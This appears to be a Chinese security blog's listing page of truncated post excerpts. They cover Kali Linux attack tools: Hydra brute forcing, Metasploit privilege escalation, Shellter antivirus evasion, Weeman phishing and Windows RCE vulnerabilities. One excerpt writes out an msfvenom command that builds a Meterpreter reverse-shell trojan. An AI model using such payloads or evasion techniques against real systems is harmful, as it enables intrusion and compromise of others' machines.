hydra是一款全能的暴力破解工具，功能强大，几乎支持所有的协议，是著名黑客组织thc开发的。 在Kali Linux下已经是默认安装的，于是测试爆破一下自己的一台VM虚拟机服务器。hydra还支持 ...

笔记一：ettercap是什么？ 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具，功能相信用过的朋友多多少少都知道，但这两款工具是在windows下运行的。 而etterc ...

在WEB渗透中当我们拿到webshell了，我们可以试试用MSF(metasploit)来进行提权，在MSF里meterpreter很强大的！ 我们先用msfvenom生成一个EXE的木马后门。 ...

Shellter 是一款动态 shellcode 注入工具，我们可以将shellcode注入到其它程序上，从而来躲避杀毒软件的查杀。俗称为免杀 官网：https://www.shellterproj ...

Microsoft Windows OLE远程代码执行漏洞，OLE（对象链接与嵌入）是一种允许应用程序共享数据和功能的技术， 远程攻击者利用此漏洞通过构造的网站执行任意代码，影响Win95+IE3 ...

MSF是Metasploit的简称，Metasploit是一款开源的安全漏洞检测工具，非常强大，分别有Windows版和Linux版，工具里集成了许多微软公布的漏洞(0day)。 我这里做测试的系统 ...

kali Linux的主版本自带的是Gnome桌面环境，安装后使用效率太低，不知道是不是我机器配置低的原因， 在虚拟机里运行起来太慢、卡、丑啦...。所以以前都一直都在用Backbox Linux， ...

名称：Microsoft DLL植入远程代码执行漏洞(CVE-2015-0096)(MS15-020) 了解：Microsoft Windows没有正确处理DLL文件的加载，存在远程代码执行漏洞，通 ...

生成反弹木马： 1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > ab ...

下午无聊再网上闲逛随意看了下，自己做了一次测试，目前最新的版本是1.6。Weeman是一款运行在Python环境下的钓鱼渗透测试工具 但这款工具简单易用，安装简单，可伪造HTML页面等等。。。网上看 ...